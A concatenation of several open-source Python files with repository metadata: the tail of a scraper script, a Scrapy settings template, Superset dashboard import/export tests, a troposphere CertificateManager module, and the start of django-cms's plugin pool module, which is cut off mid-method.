with io.open(os.path.join('.', filename), 'w', encoding='utf8') as f:
f.write(unicode(json.dumps(data, ensure_ascii=False)))
# TODO: wait for the server to be ready for us
# r = requests.post(config.SERVER_URL,
# json=data,
# params={'passPhrase': config.SERVER_AUTH_TOKEN})
# logging.info(r)
def run_scraper(scraper):
""" Runs the Scraper to get the data and dump it somewhere (db, json, ...)
"""
def get_data_and_dump((url, lang)):
try:
data = scraper.get_data(url, lang)
if not data:
raise Exception('lege data')
# TODO: remove filename param
dump(data, scraper.name + '_' + lang + '.json')
except Exception as exc:
# TODO: proper exception handling, not this catch-all crap
# TODO: reschedule this scraper
logging.exception(exc)
scraper.log = logging
pool = ThreadPool()
pool.map(get_data_and_dump, scraper.remotes)
def main():
logging.info("Start scraping")
pool = Pool(cpu_count() // 2)
pool.map(run_scraper, find_scrapers())
logging.info("Finish scraping")
if __name__ == '__main__':
main()
| gpl-2.0 | 3,455,024,879,674,022,000 | 27.873418 | 78 | 0.640509 | false |
sechiro/crawlers | curation_spider/settings.py | 1 | 3082 | # -*- coding: utf-8 -*-
# Scrapy settings for curation_spider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'curation_spider'
SPIDER_MODULES = ['curation_spider.spiders']
NEWSPIDER_MODULE = 'curation_spider.spiders'
DUPEFILTER_DEBUG = True
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'curation_spider (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY=1
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'curation_spider.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'curation_spider.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'curation_spider.pipelines.SomePipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
| apache-2.0 | -2,649,747,837,076,849,700 | 35.258824 | 109 | 0.776119 | false |
zhouyao1994/incubator-superset | tests/import_export_tests.py | 1 | 28880 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# isort:skip_file
"""Unit tests for Superset"""
import json
import unittest
from flask import g
from sqlalchemy.orm.session import make_transient
from tests.test_app import app
from superset import db, security_manager
from superset.connectors.druid.models import DruidColumn, DruidDatasource, DruidMetric
from superset.connectors.sqla.models import SqlaTable, SqlMetric, TableColumn
from superset.models import core as models
from superset.utils import core as utils
from .base_tests import SupersetTestCase
class ImportExportTests(SupersetTestCase):
"""Testing export import functionality for dashboards"""
@classmethod
def delete_imports(cls):
with app.app_context():
# Imported data clean up
session = db.session
for slc in session.query(models.Slice):
if "remote_id" in slc.params_dict:
session.delete(slc)
for dash in session.query(models.Dashboard):
if "remote_id" in dash.params_dict:
session.delete(dash)
for table in session.query(SqlaTable):
if "remote_id" in table.params_dict:
session.delete(table)
for datasource in session.query(DruidDatasource):
if "remote_id" in datasource.params_dict:
session.delete(datasource)
session.commit()
@classmethod
def setUpClass(cls):
cls.delete_imports()
cls.create_druid_test_objects()
@classmethod
def tearDownClass(cls):
cls.delete_imports()
def create_slice(
self,
name,
ds_id=None,
id=None,
db_name="examples",
table_name="wb_health_population",
):
params = {
"num_period_compare": "10",
"remote_id": id,
"datasource_name": table_name,
"database_name": db_name,
"schema": "",
# Test for trailing commas
"metrics": ["sum__signup_attempt_email", "sum__signup_attempt_facebook"],
}
if table_name and not ds_id:
table = self.get_table_by_name(table_name)
if table:
ds_id = table.id
return models.Slice(
slice_name=name,
datasource_type="table",
viz_type="bubble",
params=json.dumps(params),
datasource_id=ds_id,
id=id,
)
def create_dashboard(self, title, id=0, slcs=[]):
json_metadata = {"remote_id": id}
return models.Dashboard(
id=id,
dashboard_title=title,
slices=slcs,
position_json='{"size_y": 2, "size_x": 2}',
slug="{}_imported".format(title.lower()),
json_metadata=json.dumps(json_metadata),
)
def create_table(self, name, schema="", id=0, cols_names=[], metric_names=[]):
params = {"remote_id": id, "database_name": "examples"}
table = SqlaTable(
id=id, schema=schema, table_name=name, params=json.dumps(params)
)
for col_name in cols_names:
table.columns.append(TableColumn(column_name=col_name))
for metric_name in metric_names:
table.metrics.append(SqlMetric(metric_name=metric_name, expression=""))
return table
def create_druid_datasource(self, name, id=0, cols_names=[], metric_names=[]):
params = {"remote_id": id, "database_name": "druid_test"}
datasource = DruidDatasource(
id=id,
datasource_name=name,
cluster_name="druid_test",
params=json.dumps(params),
)
for col_name in cols_names:
datasource.columns.append(DruidColumn(column_name=col_name))
for metric_name in metric_names:
datasource.metrics.append(DruidMetric(metric_name=metric_name, json="{}"))
return datasource
def get_slice(self, slc_id):
return db.session.query(models.Slice).filter_by(id=slc_id).first()
def get_slice_by_name(self, name):
return db.session.query(models.Slice).filter_by(slice_name=name).first()
def get_dash(self, dash_id):
return db.session.query(models.Dashboard).filter_by(id=dash_id).first()
def get_datasource(self, datasource_id):
return db.session.query(DruidDatasource).filter_by(id=datasource_id).first()
def get_table_by_name(self, name):
return db.session.query(SqlaTable).filter_by(table_name=name).first()
def assert_dash_equals(self, expected_dash, actual_dash, check_position=True):
self.assertEqual(expected_dash.slug, actual_dash.slug)
self.assertEqual(expected_dash.dashboard_title, actual_dash.dashboard_title)
self.assertEqual(len(expected_dash.slices), len(actual_dash.slices))
expected_slices = sorted(expected_dash.slices, key=lambda s: s.slice_name or "")
actual_slices = sorted(actual_dash.slices, key=lambda s: s.slice_name or "")
for e_slc, a_slc in zip(expected_slices, actual_slices):
self.assert_slice_equals(e_slc, a_slc)
if check_position:
self.assertEqual(expected_dash.position_json, actual_dash.position_json)
def assert_table_equals(self, expected_ds, actual_ds):
self.assertEqual(expected_ds.table_name, actual_ds.table_name)
self.assertEqual(expected_ds.main_dttm_col, actual_ds.main_dttm_col)
self.assertEqual(expected_ds.schema, actual_ds.schema)
self.assertEqual(len(expected_ds.metrics), len(actual_ds.metrics))
self.assertEqual(len(expected_ds.columns), len(actual_ds.columns))
self.assertEqual(
set([c.column_name for c in expected_ds.columns]),
set([c.column_name for c in actual_ds.columns]),
)
self.assertEqual(
set([m.metric_name for m in expected_ds.metrics]),
set([m.metric_name for m in actual_ds.metrics]),
)
def assert_datasource_equals(self, expected_ds, actual_ds):
self.assertEqual(expected_ds.datasource_name, actual_ds.datasource_name)
self.assertEqual(expected_ds.main_dttm_col, actual_ds.main_dttm_col)
self.assertEqual(len(expected_ds.metrics), len(actual_ds.metrics))
self.assertEqual(len(expected_ds.columns), len(actual_ds.columns))
self.assertEqual(
set([c.column_name for c in expected_ds.columns]),
set([c.column_name for c in actual_ds.columns]),
)
self.assertEqual(
set([m.metric_name for m in expected_ds.metrics]),
set([m.metric_name for m in actual_ds.metrics]),
)
def assert_slice_equals(self, expected_slc, actual_slc):
# to avoid bad slice data (no slice_name)
expected_slc_name = expected_slc.slice_name or ""
actual_slc_name = actual_slc.slice_name or ""
self.assertEqual(expected_slc_name, actual_slc_name)
self.assertEqual(expected_slc.datasource_type, actual_slc.datasource_type)
self.assertEqual(expected_slc.viz_type, actual_slc.viz_type)
exp_params = json.loads(expected_slc.params)
actual_params = json.loads(actual_slc.params)
diff_params_keys = (
"schema",
"database_name",
"datasource_name",
"remote_id",
"import_time",
)
for k in diff_params_keys:
if k in actual_params:
actual_params.pop(k)
if k in exp_params:
exp_params.pop(k)
self.assertEqual(exp_params, actual_params)
def assert_only_exported_slc_fields(self, expected_dash, actual_dash):
""" only exported json has this params
imported/created dashboard has relationships to other models instead
"""
expected_slices = sorted(expected_dash.slices, key=lambda s: s.slice_name or "")
actual_slices = sorted(actual_dash.slices, key=lambda s: s.slice_name or "")
for e_slc, a_slc in zip(expected_slices, actual_slices):
params = a_slc.params_dict
self.assertEqual(e_slc.datasource.name, params["datasource_name"])
self.assertEqual(e_slc.datasource.schema, params["schema"])
self.assertEqual(e_slc.datasource.database.name, params["database_name"])
def test_export_1_dashboard(self):
self.login("admin")
birth_dash = self.get_dash_by_slug("births")
export_dash_url = "/dashboard/export_dashboards_form?id={}&action=go".format(
birth_dash.id
)
resp = self.client.get(export_dash_url)
exported_dashboards = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)["dashboards"]
birth_dash = self.get_dash_by_slug("births")
self.assert_only_exported_slc_fields(birth_dash, exported_dashboards[0])
self.assert_dash_equals(birth_dash, exported_dashboards[0])
self.assertEqual(
birth_dash.id,
json.loads(
exported_dashboards[0].json_metadata,
object_hook=utils.decode_dashboards,
)["remote_id"],
)
exported_tables = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)["datasources"]
self.assertEqual(1, len(exported_tables))
self.assert_table_equals(
self.get_table_by_name("birth_names"), exported_tables[0]
)
def test_export_2_dashboards(self):
self.login("admin")
birth_dash = self.get_dash_by_slug("births")
world_health_dash = self.get_dash_by_slug("world_health")
export_dash_url = "/dashboard/export_dashboards_form?id={}&id={}&action=go".format(
birth_dash.id, world_health_dash.id
)
resp = self.client.get(export_dash_url)
resp_data = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)
exported_dashboards = sorted(
resp_data.get("dashboards"), key=lambda d: d.dashboard_title
)
self.assertEqual(2, len(exported_dashboards))
birth_dash = self.get_dash_by_slug("births")
self.assert_only_exported_slc_fields(birth_dash, exported_dashboards[0])
self.assert_dash_equals(birth_dash, exported_dashboards[0])
self.assertEqual(
birth_dash.id, json.loads(exported_dashboards[0].json_metadata)["remote_id"]
)
world_health_dash = self.get_dash_by_slug("world_health")
self.assert_only_exported_slc_fields(world_health_dash, exported_dashboards[1])
self.assert_dash_equals(world_health_dash, exported_dashboards[1])
self.assertEqual(
world_health_dash.id,
json.loads(exported_dashboards[1].json_metadata)["remote_id"],
)
exported_tables = sorted(
resp_data.get("datasources"), key=lambda t: t.table_name
)
self.assertEqual(2, len(exported_tables))
self.assert_table_equals(
self.get_table_by_name("birth_names"), exported_tables[0]
)
self.assert_table_equals(
self.get_table_by_name("wb_health_population"), exported_tables[1]
)
def test_import_1_slice(self):
expected_slice = self.create_slice("Import Me", id=10001)
slc_id = models.Slice.import_obj(expected_slice, None, import_time=1989)
slc = self.get_slice(slc_id)
self.assertEqual(slc.datasource.perm, slc.perm)
self.assert_slice_equals(expected_slice, slc)
table_id = self.get_table_by_name("wb_health_population").id
self.assertEqual(table_id, self.get_slice(slc_id).datasource_id)
def test_import_2_slices_for_same_table(self):
table_id = self.get_table_by_name("wb_health_population").id
# table_id != 666, import func will have to find the table
slc_1 = self.create_slice("Import Me 1", ds_id=666, id=10002)
slc_id_1 = models.Slice.import_obj(slc_1, None)
slc_2 = self.create_slice("Import Me 2", ds_id=666, id=10003)
slc_id_2 = models.Slice.import_obj(slc_2, None)
imported_slc_1 = self.get_slice(slc_id_1)
imported_slc_2 = self.get_slice(slc_id_2)
self.assertEqual(table_id, imported_slc_1.datasource_id)
self.assert_slice_equals(slc_1, imported_slc_1)
self.assertEqual(imported_slc_1.datasource.perm, imported_slc_1.perm)
self.assertEqual(table_id, imported_slc_2.datasource_id)
self.assert_slice_equals(slc_2, imported_slc_2)
self.assertEqual(imported_slc_2.datasource.perm, imported_slc_2.perm)
def test_import_slices_for_non_existent_table(self):
with self.assertRaises(AttributeError):
models.Slice.import_obj(
self.create_slice("Import Me 3", id=10004, table_name="non_existent"),
None,
)
def test_import_slices_override(self):
slc = self.create_slice("Import Me New", id=10005)
slc_1_id = models.Slice.import_obj(slc, None, import_time=1990)
slc.slice_name = "Import Me New"
imported_slc_1 = self.get_slice(slc_1_id)
slc_2 = self.create_slice("Import Me New", id=10005)
slc_2_id = models.Slice.import_obj(slc_2, imported_slc_1, import_time=1990)
self.assertEqual(slc_1_id, slc_2_id)
imported_slc_2 = self.get_slice(slc_2_id)
self.assert_slice_equals(slc, imported_slc_2)
def test_import_empty_dashboard(self):
empty_dash = self.create_dashboard("empty_dashboard", id=10001)
imported_dash_id = models.Dashboard.import_obj(empty_dash, import_time=1989)
imported_dash = self.get_dash(imported_dash_id)
self.assert_dash_equals(empty_dash, imported_dash, check_position=False)
def test_import_dashboard_1_slice(self):
slc = self.create_slice("health_slc", id=10006)
dash_with_1_slice = self.create_dashboard(
"dash_with_1_slice", slcs=[slc], id=10002
)
dash_with_1_slice.position_json = """
{{"DASHBOARD_VERSION_KEY": "v2",
"DASHBOARD_CHART_TYPE-{0}": {{
"type": "DASHBOARD_CHART_TYPE",
"id": {0},
"children": [],
"meta": {{
"width": 4,
"height": 50,
"chartId": {0}
}}
}}
}}
""".format(
slc.id
)
imported_dash_id = models.Dashboard.import_obj(
dash_with_1_slice, import_time=1990
)
imported_dash = self.get_dash(imported_dash_id)
expected_dash = self.create_dashboard("dash_with_1_slice", slcs=[slc], id=10002)
make_transient(expected_dash)
self.assert_dash_equals(expected_dash, imported_dash, check_position=False)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990},
json.loads(imported_dash.json_metadata),
)
expected_position = dash_with_1_slice.position
# new slice id (auto-incremental) assigned on insert
# id from json is used only for updating position with new id
meta = expected_position["DASHBOARD_CHART_TYPE-10006"]["meta"]
meta["chartId"] = imported_dash.slices[0].id
self.assertEqual(expected_position, imported_dash.position)
def test_import_dashboard_2_slices(self):
e_slc = self.create_slice("e_slc", id=10007, table_name="energy_usage")
b_slc = self.create_slice("b_slc", id=10008, table_name="birth_names")
dash_with_2_slices = self.create_dashboard(
"dash_with_2_slices", slcs=[e_slc, b_slc], id=10003
)
dash_with_2_slices.json_metadata = json.dumps(
{
"remote_id": 10003,
"filter_immune_slices": ["{}".format(e_slc.id)],
"expanded_slices": {
"{}".format(e_slc.id): True,
"{}".format(b_slc.id): False,
},
}
)
imported_dash_id = models.Dashboard.import_obj(
dash_with_2_slices, import_time=1991
)
imported_dash = self.get_dash(imported_dash_id)
expected_dash = self.create_dashboard(
"dash_with_2_slices", slcs=[e_slc, b_slc], id=10003
)
make_transient(expected_dash)
self.assert_dash_equals(imported_dash, expected_dash, check_position=False)
i_e_slc = self.get_slice_by_name("e_slc")
i_b_slc = self.get_slice_by_name("b_slc")
expected_json_metadata = {
"remote_id": 10003,
"import_time": 1991,
"filter_immune_slices": ["{}".format(i_e_slc.id)],
"expanded_slices": {
"{}".format(i_e_slc.id): True,
"{}".format(i_b_slc.id): False,
},
}
self.assertEqual(
expected_json_metadata, json.loads(imported_dash.json_metadata)
)
def test_import_override_dashboard_2_slices(self):
e_slc = self.create_slice("e_slc", id=10009, table_name="energy_usage")
b_slc = self.create_slice("b_slc", id=10010, table_name="birth_names")
dash_to_import = self.create_dashboard(
"override_dashboard", slcs=[e_slc, b_slc], id=10004
)
imported_dash_id_1 = models.Dashboard.import_obj(
dash_to_import, import_time=1992
)
# create new instances of the slices
e_slc = self.create_slice("e_slc", id=10009, table_name="energy_usage")
b_slc = self.create_slice("b_slc", id=10010, table_name="birth_names")
c_slc = self.create_slice("c_slc", id=10011, table_name="birth_names")
dash_to_import_override = self.create_dashboard(
"override_dashboard_new", slcs=[e_slc, b_slc, c_slc], id=10004
)
imported_dash_id_2 = models.Dashboard.import_obj(
dash_to_import_override, import_time=1992
)
# override doesn't change the id
self.assertEqual(imported_dash_id_1, imported_dash_id_2)
expected_dash = self.create_dashboard(
"override_dashboard_new", slcs=[e_slc, b_slc, c_slc], id=10004
)
make_transient(expected_dash)
imported_dash = self.get_dash(imported_dash_id_2)
self.assert_dash_equals(expected_dash, imported_dash, check_position=False)
self.assertEqual(
{"remote_id": 10004, "import_time": 1992},
json.loads(imported_dash.json_metadata),
)
def test_import_new_dashboard_slice_reset_ownership(self):
admin_user = security_manager.find_user(username="admin")
self.assertTrue(admin_user)
gamma_user = security_manager.find_user(username="gamma")
self.assertTrue(gamma_user)
g.user = gamma_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10200)
# set another user as an owner of importing dashboard
dash_with_1_slice.created_by = admin_user
dash_with_1_slice.changed_by = admin_user
dash_with_1_slice.owners = [admin_user]
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
def test_import_override_dashboard_slice_reset_ownership(self):
admin_user = security_manager.find_user(username="admin")
self.assertTrue(admin_user)
gamma_user = security_manager.find_user(username="gamma")
self.assertTrue(gamma_user)
g.user = gamma_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10300)
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
# re-import with another user shouldn't change the permissions
g.user = admin_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10300)
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
def _create_dashboard_for_import(self, id_=10100):
slc = self.create_slice("health_slc" + str(id_), id=id_ + 1)
dash_with_1_slice = self.create_dashboard(
"dash_with_1_slice" + str(id_), slcs=[slc], id=id_ + 2
)
dash_with_1_slice.position_json = """
{{"DASHBOARD_VERSION_KEY": "v2",
"DASHBOARD_CHART_TYPE-{0}": {{
"type": "DASHBOARD_CHART_TYPE",
"id": {0},
"children": [],
"meta": {{
"width": 4,
"height": 50,
"chartId": {0}
}}
}}
}}
""".format(
slc.id
)
return dash_with_1_slice
def test_import_table_no_metadata(self):
table = self.create_table("pure_table", id=10001)
imported_id = SqlaTable.import_obj(table, import_time=1989)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
def test_import_table_1_col_1_met(self):
table = self.create_table(
"table_1_col_1_met", id=10002, cols_names=["col1"], metric_names=["metric1"]
)
imported_id = SqlaTable.import_obj(table, import_time=1990)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990, "database_name": "examples"},
json.loads(imported.params),
)
def test_import_table_2_col_2_met(self):
table = self.create_table(
"table_2_col_2_met",
id=10003,
cols_names=["c1", "c2"],
metric_names=["m1", "m2"],
)
imported_id = SqlaTable.import_obj(table, import_time=1991)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
def test_import_table_override(self):
table = self.create_table(
"table_override", id=10003, cols_names=["col1"], metric_names=["m1"]
)
imported_id = SqlaTable.import_obj(table, import_time=1991)
table_over = self.create_table(
"table_override",
id=10003,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_over_id = SqlaTable.import_obj(table_over, import_time=1992)
imported_over = self.get_table(imported_over_id)
self.assertEqual(imported_id, imported_over.id)
expected_table = self.create_table(
"table_override",
id=10003,
metric_names=["new_metric1", "m1"],
cols_names=["col1", "new_col1", "col2", "col3"],
)
self.assert_table_equals(expected_table, imported_over)
def test_import_table_override_identical(self):
table = self.create_table(
"copy_cat",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id = SqlaTable.import_obj(table, import_time=1993)
copy_table = self.create_table(
"copy_cat",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id_copy = SqlaTable.import_obj(copy_table, import_time=1994)
self.assertEqual(imported_id, imported_id_copy)
self.assert_table_equals(copy_table, self.get_table(imported_id))
def test_import_druid_no_metadata(self):
datasource = self.create_druid_datasource("pure_druid", id=10001)
imported_id = DruidDatasource.import_obj(datasource, import_time=1989)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
def test_import_druid_1_col_1_met(self):
datasource = self.create_druid_datasource(
"druid_1_col_1_met", id=10002, cols_names=["col1"], metric_names=["metric1"]
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1990)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990, "database_name": "druid_test"},
json.loads(imported.params),
)
def test_import_druid_2_col_2_met(self):
datasource = self.create_druid_datasource(
"druid_2_col_2_met",
id=10003,
cols_names=["c1", "c2"],
metric_names=["m1", "m2"],
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1991)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
def test_import_druid_override(self):
datasource = self.create_druid_datasource(
"druid_override", id=10004, cols_names=["col1"], metric_names=["m1"]
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1991)
table_over = self.create_druid_datasource(
"druid_override",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_over_id = DruidDatasource.import_obj(table_over, import_time=1992)
imported_over = self.get_datasource(imported_over_id)
self.assertEqual(imported_id, imported_over.id)
expected_datasource = self.create_druid_datasource(
"druid_override",
id=10004,
metric_names=["new_metric1", "m1"],
cols_names=["col1", "new_col1", "col2", "col3"],
)
self.assert_datasource_equals(expected_datasource, imported_over)
def test_import_druid_override_identical(self):
datasource = self.create_druid_datasource(
"copy_cat",
id=10005,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1993)
copy_datasource = self.create_druid_datasource(
"copy_cat",
id=10005,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id_copy = DruidDatasource.import_obj(copy_datasource, import_time=1994)
self.assertEqual(imported_id, imported_id_copy)
self.assert_datasource_equals(copy_datasource, self.get_datasource(imported_id))
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -5,938,705,838,612,700,000 | 40.494253 | 91 | 0.604778 | false |
cloudtools/troposphere | troposphere/certificatemanager.py | 1 | 1246 | # Copyright (c) 2012-2021, Mark Peek <[email protected]>
# All rights reserved.
#
# See LICENSE file for full license.
#
# *** Do not modify - this file is autogenerated ***
# Resource specification version: 31.1.0
from troposphere import Tags
from . import AWSObject, AWSProperty
from .validators import integer
class ExpiryEventsConfiguration(AWSProperty):
props = {
"DaysBeforeExpiry": (integer, False),
}
class Account(AWSObject):
resource_type = "AWS::CertificateManager::Account"
props = {
"ExpiryEventsConfiguration": (ExpiryEventsConfiguration, True),
}
class DomainValidationOption(AWSProperty):
props = {
"DomainName": (str, True),
"HostedZoneId": (str, False),
"ValidationDomain": (str, False),
}
class Certificate(AWSObject):
resource_type = "AWS::CertificateManager::Certificate"
props = {
"CertificateAuthorityArn": (str, False),
"CertificateTransparencyLoggingPreference": (str, False),
"DomainName": (str, True),
"DomainValidationOptions": ([DomainValidationOption], False),
"SubjectAlternativeNames": ([str], False),
"Tags": ((Tags, list), False),
"ValidationMethod": (str, False),
}
| bsd-2-clause | -346,566,488,791,936,300 | 24.428571 | 71 | 0.658106 | false |
divio/django-cms | cms/plugin_pool.py | 1 | 8752 | from operator import attrgetter
from django.core.exceptions import ImproperlyConfigured
from django.urls import re_path, include
from django.template.defaultfilters import slugify
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.utils.module_loading import autodiscover_modules
from django.utils.translation import get_language, deactivate_all, activate
from django.template import TemplateDoesNotExist, TemplateSyntaxError
from cms.exceptions import PluginAlreadyRegistered, PluginNotRegistered
from cms.plugin_base import CMSPluginBase
from cms.utils.conf import get_cms_setting
from cms.utils.helpers import normalize_name
class PluginPool:
def __init__(self):
self.plugins = {}
self.discovered = False
def _clear_cached(self):
if 'registered_plugins' in self.__dict__:
del self.__dict__['registered_plugins']
if 'plugins_with_extra_menu' in self.__dict__:
del self.__dict__['plugins_with_extra_menu']
if 'plugins_with_extra_placeholder_menu' in self.__dict__:
del self.__dict__['plugins_with_extra_placeholder_menu']
def discover_plugins(self):
if self.discovered:
return
from cms.cache import invalidate_cms_page_cache
if get_cms_setting("PAGE_CACHE"):
invalidate_cms_page_cache()
autodiscover_modules('cms_plugins')
self.discovered = True
def clear(self):
self.discovered = False
self.plugins = {}
self._clear_cached()
def validate_templates(self, plugin=None):
"""
Plugins templates are validated at this stage
"""
if plugin:
plugins = [plugin]
else:
plugins = self.plugins.values()
for plugin in plugins:
if (plugin.render_plugin and not type(plugin.render_plugin) == property
or hasattr(plugin.model, 'render_template')
or hasattr(plugin, 'get_render_template')):
if (plugin.render_template is None and
not hasattr(plugin, 'get_render_template')):
raise ImproperlyConfigured(
"CMS Plugins must define a render template, "
"a get_render_template method or "
"set render_plugin=False: %s" % plugin
)
# If plugin class defines get_render_template we cannot
# statically check for valid template file as it depends
# on plugin configuration and context.
# We cannot prevent developer to shoot in the users' feet
elif not hasattr(plugin, 'get_render_template'):
from django.template import loader
template = plugin.render_template
if isinstance(template, str) and template:
try:
loader.get_template(template)
except TemplateDoesNotExist as e:
# Note that the template loader will throw
# TemplateDoesNotExist if the plugin's render_template
# does in fact exist, but it includes a template that
# doesn't.
if str(e) == template:
raise ImproperlyConfigured(
"CMS Plugins must define a render template (%s) that exists: %s"
% (plugin, template)
)
else:
pass
except TemplateSyntaxError:
pass
else:
if plugin.allow_children:
raise ImproperlyConfigured(
"CMS Plugins can not define render_plugin=False and allow_children=True: %s"
% plugin
)
def register_plugin(self, plugin):
"""
Registers the given plugin(s).
Static sanity checks is also performed.
If a plugin is already registered, this will raise PluginAlreadyRegistered.
"""
if not issubclass(plugin, CMSPluginBase):
raise ImproperlyConfigured(
"CMS Plugins must be subclasses of CMSPluginBase, %r is not."
% plugin
)
plugin_name = plugin.__name__
if plugin_name in self.plugins:
raise PluginAlreadyRegistered(
"Cannot register %r, a plugin with this name (%r) is already "
"registered." % (plugin, plugin_name)
)
plugin.value = plugin_name
self.plugins[plugin_name] = plugin
return plugin
def unregister_plugin(self, plugin):
"""
Unregisters the given plugin(s).
If a plugin isn't already registered, this will raise PluginNotRegistered.
"""
plugin_name = plugin.__name__
if plugin_name not in self.plugins:
raise PluginNotRegistered(
'The plugin %r is not registered' % plugin
)
del self.plugins[plugin_name]
def get_all_plugins(self, placeholder=None, page=None, setting_key="plugins", include_page_only=True):
from cms.utils.placeholder import get_placeholder_conf
self.discover_plugins()
plugins = sorted(self.plugins.values(), key=attrgetter('name'))
template = page.get_template() if page else None
allowed_plugins = get_placeholder_conf(
setting_key,
placeholder,
template,
) or ()
excluded_plugins = get_placeholder_conf(
'excluded_plugins',
placeholder,
template,
) or ()
if not include_page_only:
# Filters out any plugin marked as page only because
# the include_page_only flag has been set to False
plugins = (plugin for plugin in plugins if not plugin.page_only)
if allowed_plugins:
# Check that plugins are in the list of the allowed ones
